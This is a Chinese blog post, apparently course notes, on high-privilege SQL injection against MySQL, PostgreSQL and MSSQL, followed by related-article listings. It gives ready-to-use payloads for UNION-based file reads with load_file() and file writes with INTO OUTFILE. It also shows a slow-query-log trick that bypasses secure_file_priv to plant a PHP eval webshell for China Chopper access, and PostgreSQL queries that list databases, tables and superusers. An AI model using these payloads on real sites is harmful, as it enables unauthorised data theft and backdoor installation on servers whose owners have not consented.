第25天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL

最新推荐文章于 2024-06-13 13:04:41 发布
最新推荐文章于 2024-06-13 13:04:41 发布
阅读量310 收藏
点赞数
文章标签: postgresql sql mysql
.
本文链接:https://blog.csdn.net/wuqingsix/article/details/127910110
版权

Access无高权限注入点-只能猜解,还是暴力猜解 ,因为其中只有一个用户权限

MYSQL,PostgreSQL,MSSQL高权限注入点-可升级读写执行等

高权限由来:当前的脚本采用的是高权限用户链接的数据库,当前产生注入点的话就是高权限

MYSQL当为root高权限读写

2为注入点

127.0.0.1/1.php?id=1 union select 1,load_fle('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

使用load_file()函数读取文件内容。需填写绝对路径 D/:

127.0.0.1/1.php?id=1 union select 1,'xxxx',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile'd:/www.txt'

当不知道绝对路径时,可以通过报错信息,字典爆破,phpinfo()文件等方法进行收集绝对路径

报错信息爆出目录:

写进菜刀连接的恶意代码:

当mysql数据库有secure_file_priv设置时,需要突破

就需要借助phpmyadmin或能够直接连上对方数据库的进行绕过,后执行下列语句

set global slow_query_log=1; //开启mysql的慢日志功能
set global slow_query_log_file='shell路径'; //设置日志文件路径
select '<?php eval($_GET[A])?>' or SLEEP(1); //写入后门后,菜刀连接即可

注意路径中是双//   

PostgreSQL-高权限读写注入

-测列数:

同样的手法  把order by 找出的显位 改为null

union select null , null , null , null

发现在2,3位有独立显位

and 1=2 UNION SELECT null,version(),null,null

and 1=2 UNION SELECT null,current_user,null,null

and 1=2 union select null,current_database(),null,null

执行payload后  找到了数据库名 和版本

-获取所有数据库名:

and 1=2 union select null,string_agg(datname,','),null,null from pg_database

-获取数据库下的表名:(2种方式均可)

1and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'

2and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

 和mysql数据库查询是不是高权限用户的区别是

获取dba用户(同样在DBA{高权限}用户下,是可以进行文件读写的):执行以下语句

and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE

 

sqlserver

环境:IIS+ASP+sqlserver

最高权限是 ;   SA

类似以上做法

 

 

 

 

 

    

 

 

My Year 2019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
各数据库(MySQLPostgreSQL、Oracle、MsSQL)有关自增字段的设置
cradle2006的专栏
08-29 377
在数据库设计过程中,我们通常会把数据库表中的ID字段设置成自增。下面以常用的数据字典表为例,说明如何在各数据库下设置自增字段。 MySQL MySQL数据库只需要在目标字段上添加AUTO_INCREMENT,并且为表设置AUTO_INCREMENT=x。 x:自增开始的数字。 参考示例: CREATE TABLE `dictionary` ( `id` int(10) unsigned N...
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
m0_65336233的博客
10-08 382
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
第二十五WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
m0_51322401的博客
01-31 584
分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '
第13-Web漏洞——SQL注入MYSQL注入
MCTSOG的博客
01-21 2931
高权限注入及低权限注入 mysql5.0以上特性 MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息,其中具有表schemata(数据库名),table(表名),columns(列名或字段名) 在schemata表中,schema_name字段用来存储数据库名 在table表中,table_schema和table_name分别用来存储数据库名和表名 在column表中,table_schema(数据库名),table_name(表名),.
SQL注入(二)mysqlPostgreSQL、MSSQL
m0_63917373的博客
10-03 375
SQL注入(二)mysqlPostgreSQL、MSSQL
迁移:Golang go-pg和PostgreSQLSQL数据库迁移
02-05
Golang和PostgreSQLSQL迁移 该软件包允许您使用在PostgreSQL数据库上运行迁移。 有关详细信息,请参见。 您可能还需要在做出决定之前检查 。 安装 go-pg / migrations需要具有支持的Go版本,并使用导入路径版本...
nginx-phpfpm-mysql-postgresql:Nginx PHP-FPM和MySQL安装和配置
05-16
它将nginx Web服务器安装到该服务器。 之后,该脚本将为站点名... 如果您要打开带有页面,则必须看到已安装MySQL版本或对于PostgreSQL来说是一本书提交页面。 如果要添加新的虚拟主机,请使用add-vhost-ngphfpmypg
sequelize-auto-migrations:迁移生成器&& sequelize的运行器
01-30
顺序自动迁移迁移生成器和&序列化器该软件包提供了两个工具: makemigration用于创建新迁移的工具runmigration由第一个工具迁移创建的应用工具安装npm install sequelize-auto-migrations 用法使用sequelize init和...
suql:Sugar SQL MySQL PostgreSQL PostgreSQL MSSQL Oracle NoSQL
02-04
SQL这是什么? SuQL是SQL的语法糖。这是如何运作的? 点击下面的图片以查看YouTube上的整个演示。你为什么需要这个? 一次编写查询,用于每个DBMS。 编写易于阅读和编写的查询。 自行扩展SuQL语法。 SQL不是限制。...
pg-listen::satellite_antenna:PostgreSQL LISTEN&NOTIFY for node.js终于可以工作了
02-05
pg听Postgres有效的监听和通知 PostgreSQL可以充当消息代理:从一个数据库客户端向其他数据库客户端发送带有任意有效负载的通知。 与node.js 8+和普通JavaScript或TypeScript 3一起使用。使用Postgres 语句并使用...
PostgreSQL 注入整理
瞎几把学
05-17 4626
PostgreSQL 注入整理 <br />5432端口<br />/*order by猜字段数*/<br />http://www.bug.cx/detail.php?id=236+order+by+26--<br />/*判断postgresql数据库*/<br />http://www.bug.cx/detail.php?id=236+and+1::int=1--<br />/*通过cast类型转换来暴postgresql信息*/<br />http://www.bug.cx/detail.php?i
Oracle&Postgresql注入
tell_me_404的博客
02-27 546
一、Oracle注入详解: 与Oracle数据库搭配: 脚本语言asp,aspx,jsp web服务器:tomcat 测试站点:http://www.e-hifarms.com/yellowpage/detail.jsp?id=111 1、判断注入 略 2、判断oracle数据库: id=1 and exists(select * from dual) id=1 and exist...
[转] 关于入侵PostgreSQL的那些事儿(文件读取写入、命令执行的办法)
weixin_34329187的博客
02-02 687
标签 PostgreSQL , 入侵 , 注入 , 文件修改 , 文件读取 , 文件写入 , 大对象 , so , 二进制 , C函数 背景 原文 https://www.2cto.com/article/201307/226572.html 今无意发现了个PostgreSQL环境,线上学习了下,一般的数据注射(读写数据库)差异不大,不做讨论,个...
postgresql 渗透测试_渗透经验分享之SQL注入思路拓展
weixin_28686463的博客
12-24 466
写在文前从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多写几篇,也可能因为实战经验不足就此荒废这个系列。总之看心情和时间安排吧。注入的几个问题SQL注入所涉及到的东西无非就以下几方面哪里会经常出现注入bypass waf如何快速定位重要数据表大数据...
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
m0_65336233的博客
10-10 637
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
MSSQL,MYSQL和POSTGRES数据库的一些区别
足迹
12-25 2799
一、字符串连接1、MSSQLSELECT 字段1 + - + 字段2 FROM TABLE;2、MYSQLSELECT CONCAT(字段1,-,字段2) FROM TABLE;3、POSTGRESSELECT 字段1||-||字段2 FROM TABLE;二、SELECT INTO1、MSSQLMYSQLSELECT 字段1... INTO 变量
【运维】如何更换Ubuntu默认的Python版本,update-alternatives如何使用
q742971636的博客
06-09 611
它可以用于在系统中设置默认的软件版本,例如在不同版本的软件之间进行切换,比如不同的 Python 版本。如果你希望在系统中使用不同的 Python 版本,首先需要确保这些版本已经安装。是优先级,用于指示默认的 Python 版本。较高的数字表示较高的优先级,因此,Python 3.9 将成为默认版本。这将列出系统中安装的 Python 版本,并提示你选择默认的版本。安装你需要的 Python 包,你可以使用适用于所选 Python 版本的。更改默认的 Python 版本,并安装你所需的包。
jmeter性能优化之mysql监控sql慢查询语句分析
回家吃月饼的学习交流地
06-09 820
jmeter性能之sql慢查询语句分析
Sqlite3入门和c/c++下使用
最新发布
fg247778718的博客
06-13 350
1. 创建数据表格create table 表名(字段名 数据类型, 字段名 数据类型);2. 插入数据insert into 表名 values('字段数据','字段数据','字段数据','字段数据' );insert into student values('20200101', '张三', '广州','25648');insert into student values('20200102', '李四', '广州','25645');3. 查询数据(1) 查询。
sudo: postgresql-setup: command not found
12-01
根据提供的引用内容,可能是因为postgresql-setup命令没有安装或者没有正确安装。您可以尝试重新安装postgresql-server和postgresql-contrib软件包,然后再次运行postgresql-setup命令。具体步骤如下: 1. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值